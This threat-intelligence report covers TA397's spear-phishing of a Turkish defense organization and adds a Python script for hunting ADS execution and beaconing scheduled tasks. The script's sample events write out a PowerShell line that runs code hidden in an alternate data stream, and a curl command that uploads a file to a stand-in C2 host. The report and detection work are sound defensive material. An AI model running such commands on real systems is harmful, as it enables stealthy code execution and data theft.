Sophisticated phishing attack targeting Turkey’s defense sector revealed TA397’s advanced tactics
Analysis Summary
# Threat Actor: TA397 (Bitter)
## Attribution & Identity
**Threat Actor:** TA397
**Known Aliases:** Bitter
**Association:** Assessed to conduct espionage in support of a South Asian government, based on its historical targeting and on operational hours consistent with a UTC+5:30 working day.
## Activity Summary
The actor was observed conducting a sophisticated spear-phishing campaign targeting a Turkish defense sector organization. This campaign utilized socially engineered lures related to public sector infrastructure projects ("PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR"). The activity involved multi-stage execution using LNK files, hidden NTFS Alternate Data Streams (ADS), and scheduled tasks to establish persistence and deploy RATs. Historical activities show targeting of defense and public sector organizations across EMEA and APAC regions.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing emails delivering RAR archives.
- **Execution & Defense Evasion:** A shortcut (LNK) file in the archive launches PowerShell code that the actor hid in an NTFS Alternate Data Stream (ADS) named "Participation", so the payload is not visible in a normal directory listing.
- **Persistence:** A scheduled task named "DsSvcCleanup" runs every 17 minutes and beacons machine data out to the actor's infrastructure.
- **Command and Control:** Actor-controlled domains are used both for beaconing and for staging later-stage payloads.
- **Payload Delivery:** Operators respond manually to the initial beacons, delivering the final payload (WmRAT or MiyaRAT) as an MSI installer downloaded by the victim host.
## Targeting
**Sectors:** Defense sector, public sector organizations, organizations involved in infrastructure projects.
**Geography:** Turkey (observed victim); historical targeting includes EMEA and APAC regions.
**Victims:** A Turkish defense sector organization.
## Tools & Infrastructure
**Malware Families Used:**
- **WmRAT:** Written in C++, capable of file exfiltration, running arbitrary commands, and taking screenshots.
- **MiyaRAT:** Written in C++; a more refined tool offering a reverse shell and richer directory enumeration, deployed sparingly against higher-value targets.
**Infrastructure (C2, domains, IPs):**
- Staging Domain: jacknwoods[.]com
## Implications
TA397 demonstrates mature tradecraft, specifically staging and executing its payload from an NTFS ADS and relying on a scheduled task for durable persistence. Its focus on defense contractors and public investment projects points to intelligence collection of interest to a state sponsor. The manual response to beacons and the use of two distinct RATs, one held back for higher-value targets, indicate a well-resourced operation that triages victims before committing its better tooling.
## Mitigations
- Employ robust email filtering to detect and block suspicious attachments, especially RAR archives with embedded shortcuts.
- Monitor for unusual scheduled task creation, particularly those beaconing data externally (e.g., "DsSvcCleanup").
- Implement detection for the use of PowerShell commands executed from NTFS Alternate Data Streams.
- Harden remote-access controls and apply least privilege on endpoints, since the RATs exist to give the operators persistent, interactive access to the host.
- Block command and control communication to known or suspected TA397 infrastructure, such as jacknwoods[.]com.
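The two detection items above (scheduled tasks that beacon on a short interval, PowerShell reading an ADS) and the execution and persistence TTPs listed earlier can be turned into concrete hunting logic. The following Python is an added example, not code from the original report or from any vendor: it runs over constructed Sysmon Event ID 1 and Security Event ID 4698 records (field names follow those logs; the paths, task XML and the host c2.example.invalid are synthetic placeholders), flags command lines that read a non-benign alternate data stream, and flags newly created tasks whose repetition interval is 30 minutes or less. The 30-minute threshold and the SUSPECT_EXEC list are assumptions chosen for this example.

```python
"""Hunting logic for two TA397 behaviours described above: command lines that
read an NTFS alternate data stream (the LNK -> PowerShell -> "Participation"
chain) and scheduled tasks that repeat on a short interval (DsSvcCleanup).
Added example, not code from the original report.  Records in SAMPLE_EVENTS
are constructed to resemble JSON-normalised Sysmon Event ID 1 and Security
Event ID 4698; the paths, task XML and c2.example.invalid host are synthetic."""
import re
import xml.etree.ElementTree as ET
from datetime import timedelta

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# path:stream in double quotes, single quotes, or unquoted.  The drive colon in
# C:\ never matches: a stream name cannot begin with a backslash.
ADS_REF = re.compile(
    r'"([^"]*?):([A-Za-z0-9_.$-]+)"'
    r"|'([^']*?):([A-Za-z0-9_.$-]+)'"
    r'|((?:[A-Za-z]:)?[\\.][^\s:"\']+):([A-Za-z0-9_.$-]+)')
BENIGN_STREAMS = {"Zone.Identifier", "$DATA"}   # touched constantly by legitimate tools
SUSPECT_EXEC = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe",
                "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "msiexec.exe"}
_DUR = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def ads_references(command_line):
    """Return (path, stream) for each non-benign ADS reference in a command line."""
    hits = []
    for m in ADS_REF.finditer(command_line):
        path, stream = [g for g in m.groups() if g is not None]
        if stream not in BENIGN_STREAMS:
            hits.append((path, stream))
    return hits


def parse_duration(text):
    """Parse the day/time subset of ISO 8601 durations Task Scheduler emits, e.g. PT17M."""
    m = _DUR.match(text.strip())
    if not m:
        raise ValueError("unsupported duration: %r" % text)
    d, h, mi, s = (int(x or 0) for x in m.groups())
    return timedelta(days=d, hours=h, minutes=mi, seconds=s)


def triage_task(record, max_interval=timedelta(minutes=30)):
    """Flag a 4698 record whose trigger repeats at or below max_interval, else None."""
    # Real TaskContent starts with a UTF-16 XML declaration; strip it before parsing str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", record["TaskContent"]))
    intervals = [parse_duration(e.text) for e in root.iter(TASK_NS + "Interval")]
    if not intervals or min(intervals) > max_interval:
        return None
    actions = [((ex.findtext(TASK_NS + "Command") or "").strip().strip('"'),
                (ex.findtext(TASK_NS + "Arguments") or "").strip())
               for ex in root.iter(TASK_NS + "Exec")]
    lolbin = any(cmd.rsplit("\\", 1)[-1].lower() in SUSPECT_EXEC for cmd, _ in actions)
    return {"rule": "short-interval-task", "task": record["TaskName"],
            "interval": min(intervals), "actions": actions,
            "severity": "high" if lolbin else "low"}


def hunt(events):
    """Run both checks over a list of normalised event dicts; return findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            for path, stream in ads_references(ev.get("CommandLine", "")):
                findings.append({"rule": "ads-execution", "image": ev.get("Image"),
                                 "parent": ev.get("ParentImage"), "path": path, "stream": stream})
        elif ev.get("EventID") == 4698:
            finding = triage_task(ev)
            if finding:
                findings.append(finding)
    return findings


# --- constructed sample telemetry (not real logs) ---------------------------
LURE = r"C:\Users\victim\Downloads\PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR.pdf"
BEACON_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2025-01-06T09:00:00</StartBoundary>
    <Repetition><Interval>PT17M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>cmd.exe</Command>
    <Arguments>/c curl -s http://c2.example.invalid/ --data-binary @%TEMP%\\i.txt</Arguments>
  </Exec></Actions></Task>"""
DEFRAG_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-05T01:00:00</StartBoundary>
    <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>
    <Arguments>-c -h</Arguments></Exec></Actions></Task>"""
SAMPLE_EVENTS = [
    # LNK-spawned cmd launches PowerShell that reads the hidden stream and pipes it to iex
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "Get-Content -Raw \'%s:Participation\' | iex"' % LURE},
    # benign: a tool reading the mark-of-the-web stream
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c more < C:\Temp\setup.exe:Zone.Identifier"},
    {"EventID": 4698, "TaskName": r"\DsSvcCleanup", "TaskContent": BEACON_TASK},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "TaskContent": DEFRAG_TASK},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Two caveats for production use. The ADS regex deliberately drops Zone.Identifier, because browsers, Explorer and `Unblock-File` touch that stream all day; without that allowlist the rule is unusable. The task check keys on the repetition interval rather than the task name, since "DsSvcCleanup" is trivially renamed, while a task that fires every 17 minutes and launches cmd.exe or curl.exe stands out regardless of what it is called.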